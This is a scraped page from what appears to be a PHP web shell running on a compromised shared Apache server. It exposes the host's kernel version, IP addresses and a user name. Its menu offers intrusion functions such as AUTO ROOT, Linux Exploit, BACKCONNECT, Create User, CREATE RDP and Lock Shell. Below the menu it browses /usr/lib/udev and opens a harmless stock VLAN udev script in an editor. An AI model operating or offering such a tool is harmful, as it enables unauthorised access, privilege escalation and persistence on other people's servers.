Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
udev /
[ HOME SHELL ]
Name
Size
Permission
Action
hwdb.d
[ DIR ]
drwxr-xr-x
rules.d
[ DIR ]
drwxr-xr-x
ata_id
62.63
KB
-rwxr-xr-x
bcache-export-cached
1.13
KB
-rwxr-xr-x
bcache-register
14.3
KB
-rwxr-xr-x
cdrom_id
78.64
KB
-rwxr-xr-x
dmi_memory_id
74.63
KB
-rwxr-xr-x
fido_id
98.64
KB
-rwxr-xr-x
hdparm
1.37
KB
-rwxr-xr-x
hwclock-set
252
B
-rwxr-xr-x
hwdb.bin
10.67
MB
-r--r--r--
ifupdown-hotplug
2.88
KB
-rwxr-xr-x
kpartx_id
2.33
KB
-rwxr-xr-x
libinput-device-group
18.3
KB
-rwxr-xr-x
libinput-fuzz-extract
14.3
KB
-rwxr-xr-x
libinput-fuzz-to-zero
14.3
KB
-rwxr-xr-x
mtd_probe
22.43
KB
-rwxr-xr-x
probe-bcache
14.3
KB
-rwxr-xr-x
scsi_id
83.15
KB
-rwxr-xr-x
usb_modeswitch
1.53
KB
-rwxr-xr-x
v4l_id
22.5
KB
-rwxr-xr-x
vlan-network-interface
1.36
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vlan-network-interface
#!/bin/sh # vlan-network-interface - configure a network bridge # # This service checks whether a physical network device that has been added # has VLAN defined in /etc/network/interfaces that should be brought up set -e if [ -z "$INTERFACE" ]; then echo "missing \$INTERFACE" >&2 exit 1 fi if ! which ifquery >/dev/null; then exit 0 fi if [ ! -x /etc/network/if-pre-up.d/vlan ]; then exit 0 fi mkdir -p /run/network for IFACE in $(ifquery --list --allow auto); do IF_VLAN_RAW_DEVICE=$(ifquery $IFACE | sed -n -e's/^vlan[_-]raw[_-]device: //p') # If there is no vlan-raw-device defined, check for vlan-formatted name # for example, eth1.123 if [ -z "$IF_VLAN_RAW_DEVICE" ]; then IF_VLAN_RAW_DEVICE=${IFACE%%.*} [ "$IFACE" = "$IF_VLAN_RAW_DEVICE" ] && continue fi # Check if this (vlan) $IFACE uses raw-device $INTERFACE [ "$IF_VLAN_RAW_DEVICE" != "$INTERFACE" ] && continue # If we're being called directly from udev, we only want to create the # vlan interface if there is no associated ifupdown config for the # raw-device; otherwise the ifup for the raw-device will create the # vlan interface(s) [ "$1" = "UDEV" ] && ifquery $IF_VLAN_RAW_DEVICE && continue # Create the VLAN interface(s) related to the raw-device interface export IFACE IF_VLAN_RAW_DEVICE /etc/network/if-pre-up.d/vlan done
Close